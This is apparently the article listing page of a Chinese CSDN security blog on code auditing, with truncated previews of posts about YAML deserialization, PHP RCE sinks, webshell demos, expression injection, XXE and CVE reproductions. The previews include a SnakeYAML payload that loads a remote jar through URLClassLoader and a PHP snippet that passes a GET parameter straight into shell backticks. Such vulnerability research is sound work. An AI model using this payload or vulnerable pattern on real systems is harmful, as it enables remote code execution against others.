![](https://img-blog.csdnimg.cn/20201014180756928.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
代码审计
u013224189
这个作者很懒,什么都没留下…
展开
-
yaml反序列化
Yaml反序列化payloads1:!!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL ["http://127.0.0.1:7800/yaml-payload.jar"] ]]]payloads2: 绕过 !! 的限制,如下: !可以用 tag:yaml.org,2002 表示。!<tag:yaml.org,2002:javax.script.Scri原创 2020-11-23 00:05:02 · 2175 阅读 · 1 评论 -
PHP代码审计
PHP代码审计RCE反引号中包括变量<?php$varch = $_GET['hi'];$output = `$varch`;echo "<pre>$output</pre>";?>array_map()中包含变量作用是为数组的每个元素应用回调函数 。其返回值为数组,是为 array1 每个元素应用 callback函数之后的数组。 callback 函数形参的数量和传给 array_map() 数组数量,两者必须一样。<?php$arra原创 2020-11-23 00:02:06 · 540 阅读 · 0 评论 -
java-web安全——RandomAccessFile 和 FileSystemProvider文件读写
package com.his;import java.io.ByteArrayOutputStream;import java.io.File;import java.io.IOException;import java.io.RandomAccessFile;import java.nio.file.Files;import java.nio.file.Path;import ...原创 2020-04-25 22:02:03 · 464 阅读 · 0 评论 -
liferay CVE-2020-7961 漏洞回显
liferay CVE-2020-7961 漏洞回显import com.liferay.portal.kernel.security.access.control.AccessControlUtil;import com.liferay.portal.kernel.security.auth.AccessControlContext;import javax.servlet.http.H...原创 2020-04-22 17:32:04 · 1717 阅读 · 0 评论 -
idea搜索 matches limit
idea搜索 matches limit 默认显示100,可通过如下限制,增加搜索返回内容help ——> find Action ——> 输入 Registry ——> 找到 ide.usages.page.size ,修改原创 2020-04-21 08:49:19 · 422 阅读 · 0 评论 -
EBS远程调试
EBS远程调试/u01/install/APPS/inst/apps/EBSDB_ebs/ora/10.1.3/opmn/conf/opmn.xml原创 2020-04-21 08:29:50 · 165 阅读 · 0 评论 -
404 WebshellDemo
404 webshell Demopackage controller;import org.springframework.stereotype.Controller;import org.springframework.web.bind.annotation.RequestMapping;import javax.servlet.http.HttpServletRequest;i...原创 2020-09-28 11:30:14 · 253 阅读 · 0 评论 -
Fel表达式注入
Fel表达式注入命令执行Demopackage com.his;import com.greenpineyu.fel.Expression;import com.greenpineyu.fel.FelEngine;import com.greenpineyu.fel.FelEngineImpl;import com.greenpineyu.fel.context.FelContext;...原创 2020-03-31 22:05:42 · 1395 阅读 · 0 评论 -
XML文件的解析以及XML外部实体注入防护
XML外部实体注入 (XXE防护)原创 2015-11-10 18:41:16 · 36853 阅读 · 14 评论 -
Web安全之语法知识补习
Web安全,不可信数据源及缺陷可能发生的位置原创 2015-11-03 18:45:50 · 819 阅读 · 0 评论 -
OWASP ZAP上手体验
新领到一个任务,试下OWASP ZAP。工具说明 ZAproxy是一个易于使用交互式的用于web应用程序漏洞挖掘的渗透测试工具,可以检测sql注入,跨站脚本,跨站请求伪造以及路径遍历等问题。 下载地址https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project 工具说明原创 2015-10-30 17:53:20 · 29787 阅读 · 3 评论 -
小白上路_spring-security-oauth2 RCE复现分析
小白上路_spring-security-oauth2 RCE复现分析首先高兴的宣布,CVE-2018-1260这个漏洞复现成功,弹出了windows可爱的计算器然后就狠狠的抽自己一巴掌,讲述一下自己怎么把它折腾出来的。关于CVE-2018-1260一个标准的由于spring将不可信数据当作SPEL表达式直接解析导致的RCE漏洞影响范围Spring Securit...原创 2018-06-29 14:15:25 · 1046 阅读 · 0 评论 -
微信支付SDK XXE漏洞 验证复现
今天公司收到漏洞预警,微信支付SDK存在XXE漏洞,下载到本地验证了一下漏洞信息来源http://seclists.org/fulldisclosure/2018/Jul/3https://xz.aliyun.com/t/2426漏洞描述微信支持提供了一个接口,供商家接收异步支付结果,微信支付所用的java sdk在处理结果时可能触发一个XXE漏洞,攻击者可以向这...原创 2018-07-03 18:08:08 · 12150 阅读 · 2 评论 -
OGNL表达式注入漏洞要成为过去了吗?
起因Struts2今年来爆出一系列安全漏洞,以至于在官方release页面,还专门罗列了各个版本对应的CVE漏洞,也算是一大奇观。![struts_release](https://img-blog.csdn.net/20180716180339458?watermark/2/text/aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3UwMTMyMjQxODk=/font/5a6...原创 2018-07-18 08:55:08 · 8488 阅读 · 0 评论 -
S2-057 本地复现
下午正不慌不忙测着我的安卓应用呢,突然爆了个Struts2漏洞,心里咯噔一下,不会吧,上个月工作汇报还在吹水Struts2在升级OGNL后,很难由于不正当OGNL解析造成任意命令执行了。原文见:https://blog.csdn.net/u013224189/article/details/81091874怀着不安的心情,看了下漏洞信息,踏马的,还真是这个地方。Struts2 7月份升级...原创 2018-08-23 14:36:30 · 2458 阅读 · 4 评论 -
Web安全之C#语法学习
ASP.NET Web安全知识原创 2015-11-02 16:30:24 · 1577 阅读 · 0 评论